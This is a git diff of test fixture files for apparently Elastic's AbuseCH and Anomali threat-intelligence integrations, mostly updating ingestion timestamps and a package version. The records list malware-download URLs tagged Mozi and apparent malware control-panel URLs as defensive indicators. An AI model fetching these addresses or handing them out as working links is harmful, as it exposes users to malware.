@@ -31933,7 +31933,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029432400Z", + "ingested": "2021-12-14T14:56:15.726669519Z", "original": "{\"id\":\"960889\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960889/\",\"url\":\"http://89.160.20.156:51620/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31982,7 +31982,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029439Z", + "ingested": "2021-12-14T14:56:15.726669888Z", "original": "{\"id\":\"960890\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960890/\",\"url\":\"http://89.160.20.156:42585/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32031,7 +32031,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029445600Z", + "ingested": "2021-12-14T14:56:15.726670256Z", "original": "{\"id\":\"960891\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960891/\",\"url\":\"http://89.160.20.156:57941/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -32080,7 +32080,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029452200Z", + "ingested": "2021-12-14T14:56:15.726670677Z", "original": "{\"id\":\"960888\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960888/\",\"url\":\"http://89.160.20.156:38308/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:32:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -32129,7 +32129,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029458800Z", + "ingested": "2021-12-14T14:56:15.726671043Z", "original": "{\"id\":\"960887\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960887/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32178,7 +32178,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029465800Z", + "ingested": "2021-12-14T14:56:15.726671420Z", "original": "{\"id\":\"960886\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960886/\",\"url\":\"http://89.160.20.156:57662/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -32227,7 +32227,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029472300Z", + "ingested": "2021-12-14T14:56:15.726671794Z", "original": "{\"id\":\"960885\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960885/\",\"url\":\"http://89.160.20.156:40738/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32276,7 +32276,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029478900Z", + "ingested": "2021-12-14T14:56:15.726672173Z", "original": "{\"id\":\"960884\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960884/\",\"url\":\"http://89.160.20.156:59018/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32325,7 +32325,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029487Z", + "ingested": "2021-12-14T14:56:15.726672541Z", "original": "{\"id\":\"960880\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960880/\",\"url\":\"http://89.160.20.156:60279/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -32374,7 +32374,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029494Z", + "ingested": "2021-12-14T14:56:15.726672908Z", "original": "{\"id\":\"960881\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960881/\",\"url\":\"http://89.160.20.156:52738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32423,7 +32423,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029500500Z", + "ingested": "2021-12-14T14:56:15.726673273Z", "original": "{\"id\":\"960882\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960882/\",\"url\":\"http://89.160.20.156:37394/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -32472,7 +32472,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029507100Z", + "ingested": "2021-12-14T14:56:15.726673639Z", "original": "{\"id\":\"960883\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960883/\",\"url\":\"http://89.160.20.156:56491/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -32521,7 +32521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029513800Z", + "ingested": "2021-12-14T14:56:15.726673999Z", "original": "{\"id\":\"960879\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960879/\",\"url\":\"http://89.160.20.156:46067/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:20:19 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/manifest.yml b/packages/ti_abusech/manifest.yml index 93d532f07db..2bc81339ff4 100644 --- a/packages/ti_abusech/manifest.yml +++ b/packages/ti_abusech/manifest.yml @@ -1,6 +1,6 @@ name: ti_abusech title: AbuseCH -version: 1.1.3 +version: 1.1.4 release: ga description: Collect threat intelligence from AbuseCH API with Elastic Agent. type: integration diff --git a/packages/ti_anomali/changelog.yml b/packages/ti_anomali/changelog.yml index d1843399aea..272074e86d2 100644 --- a/packages/ti_anomali/changelog.yml +++ b/packages/ti_anomali/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.3" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.2" changes: - description: Change test public IPs to the supported subset diff --git a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json index 123f0a43007..aa6eb8ca2fc 100644 --- a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json +++ b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json 
@@ -39,7 +39,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022544100Z", + "ingested": "2021-12-14T14:57:43.118149300Z", "original": "{\"created\":\"2020-01-22T02:58:57.431Z\",\"description\":\"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:58:57.431Z\",\"name\":\"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.431Z\"}", "category": "threat", "type": "indicator", @@ -91,7 +91,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022557600Z", + "ingested": "2021-12-14T14:57:43.118152580Z", "original": "{\"created\":\"2020-01-22T02:58:57.503Z\",\"description\":\"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:58:57.503Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.503Z\"}", "category": "threat", "type": "indicator", 
@@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022562300Z", + "ingested": "2021-12-14T14:57:43.118153162Z", "original": "{\"created\":\"2020-01-22T02:58:57.57Z\",\"description\":\"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0e14122-9005-4776-99fc-00872476c6d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-22T02:58:57.57Z\",\"name\":\"mal_url: http://f0387770.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387770.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.57Z\"}", "category": "threat", "type": "indicator", @@ -193,7 +193,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022569300Z", + "ingested": "2021-12-14T14:57:43.118153700Z", "original": "{\"created\":\"2020-01-22T02:58:59.366Z\",\"description\":\"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-01-22T02:58:59.366Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.366Z\"}", "category": "threat", "type": "indicator", 
@@ -245,7 +245,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022574800Z", + "ingested": "2021-12-14T14:57:43.118154276Z", "original": "{\"created\":\"2020-01-22T02:58:59.457Z\",\"description\":\"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--189ce776-6d7e-4e85-9222-de5876644988\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T02:58:59.457Z\",\"name\":\"mal_url: http://appareluea.com/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.457Z\"}", "category": "threat", "type": "indicator", @@ -297,7 +297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022580800Z", + "ingested": "2021-12-14T14:57:43.118154719Z", "original": "{\"created\":\"2020-01-22T02:59:06.402Z\",\"description\":\"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a4144d34-b86d-475e-8047-eb46b48ee325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T02:59:06.402Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:06.402Z\"}", "category": "threat", "type": "indicator", 
@@ -342,7 +342,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022585800Z", + "ingested": "2021-12-14T14:57:43.118155165Z", "original": "{\"created\":\"2020-01-22T02:59:19.99Z\",\"description\":\"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-22T02:59:19.99Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:19.99Z\"}", "category": "threat", "type": "indicator", @@ -394,7 +394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022589700Z", + "ingested": "2021-12-14T14:57:43.118155743Z", "original": "{\"created\":\"2020-01-22T02:59:20.155Z\",\"description\":\"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-22T02:59:20.155Z\",\"name\":\"mal_url: http://ntrcgroup.com/nze/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:20.155Z\"}", "category": "threat", "type": "indicator", 
@@ -446,7 +446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022595Z", + "ingested": "2021-12-14T14:57:43.118156326Z", "original": "{\"created\":\"2020-01-22T02:59:25.521Z\",\"description\":\"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:59:25.521Z\",\"name\":\"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.521Z\"}", "category": "threat", "type": "indicator", @@ -497,7 +497,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022602600Z", + "ingested": "2021-12-14T14:57:43.118156797Z", "original": "{\"created\":\"2020-01-22T02:59:25.626Z\",\"description\":\"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:59:25.626Z\",\"name\":\"mal_url: http://f0390764.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390764.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.626Z\"}", "category": "threat", "type": "indicator", 
@@ -542,7 +542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022609900Z", + "ingested": "2021-12-14T14:57:43.118157183Z", "original": "{\"created\":\"2020-01-22T02:59:36.461Z\",\"description\":\"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T02:59:36.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:36.461Z\"}", "category": "threat", "type": "indicator", @@ -594,7 +594,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022646200Z", + "ingested": "2021-12-14T14:57:43.118157870Z", "original": "{\"created\":\"2020-01-22T02:59:41.193Z\",\"description\":\"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-22T02:59:41.193Z\",\"name\":\"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.193Z\"}", "category": "threat", "type": "indicator", 
@@ -645,7 +645,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022651100Z", + "ingested": "2021-12-14T14:57:43.118158517Z", "original": "{\"created\":\"2020-01-22T02:59:41.228Z\",\"description\":\"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime\",\"id\":\"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:41.228Z\",\"name\":\"mal_url: http://89.160.20.156/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.228Z\"}", "category": "threat", "type": "indicator", @@ -690,7 +690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022654800Z", + "ingested": "2021-12-14T14:57:43.118158964Z", "original": "{\"created\":\"2020-01-22T02:59:51.313Z\",\"description\":\"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--408ebd2d-063f-4646-b2e7-c00519869736\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-22T02:59:51.313Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.313Z\"}", "category": "threat", "type": "indicator", 
@@ -735,7 +735,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022660300Z", + "ingested": "2021-12-14T14:57:43.118159376Z", "original": "{\"created\":\"2020-01-22T02:59:51.372Z\",\"description\":\"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-22T02:59:51.372Z\",\"name\":\"mal_ip: 192.168.119.172\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.119.172']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.372Z\"}", "category": "threat", "type": "indicator", @@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022666400Z", + "ingested": "2021-12-14T14:57:43.118159905Z", "original": "{\"created\":\"2020-01-22T02:59:51.442Z\",\"description\":\"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:51.442Z\",\"name\":\"mal_url: http://f0389246.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0389246.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.442Z\"}", "category": "threat", "type": "indicator", 
@@ -838,7 +838,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022671300Z", + "ingested": "2021-12-14T14:57:43.118160411Z", "original": "{\"created\":\"2020-01-22T03:00:01.563Z\",\"description\":\"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--213519c9-f511-4188-89c8-159f35f08008\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T03:00:01.563Z\",\"name\":\"mal_url: http://appareluea.com/server/cp.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/server/cp.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:01.563Z\"}", "category": "threat", "type": "indicator", @@ -890,7 +890,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022675600Z", + "ingested": "2021-12-14T14:57:43.118160796Z", "original": "{\"created\":\"2020-01-22T03:00:03.138Z\",\"description\":\"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:00:03.138Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot2/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.138Z\"}", "category": "threat", "type": "indicator", 
@@ -942,7 +942,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022681200Z", + "ingested": "2021-12-14T14:57:43.118161328Z", "original": "{\"created\":\"2020-01-22T03:00:03.396Z\",\"description\":\"TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f3e33aab-e2af-4c15-8cb9-f008a37cf986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:03.396Z\",\"name\":\"mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.396Z\"}", "category": "threat", "type": "indicator", @@ -994,7 +994,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022686400Z", + "ingested": "2021-12-14T14:57:43.118161879Z", "original": "{\"created\":\"2020-01-22T03:00:03.642Z\",\"description\":\"TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f03f098d-2fa9-49e1-a7dd-02518aa105fa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:00:03.642Z\",\"name\":\"mal_url: http://mecharnise.ir/ca4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.642Z\"}", "category": "threat", "type": "indicator", 
@@ -1046,7 +1046,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022690600Z", + "ingested": "2021-12-14T14:57:43.118162298Z", "original": "{\"created\":\"2020-01-22T03:00:27.534Z\",\"description\":\"TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e72e3ba0-7de5-46bb-ab1e-efdf3e0a0b3b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:27.534Z\",\"name\":\"mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.534Z\"}", "category": "threat", "type": "indicator", @@ -1098,7 +1098,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022695200Z", + "ingested": "2021-12-14T14:57:43.118162685Z", "original": "{\"created\":\"2020-01-22T03:00:27.591Z\",\"description\":\"TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--d6b59b66-5020-4368-85a7-196026856ea9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-22T03:00:27.591Z\",\"name\":\"mal_url: http://kironofer.com/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kironofer.com/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.591Z\"}", "category": "threat", "type": "indicator", 
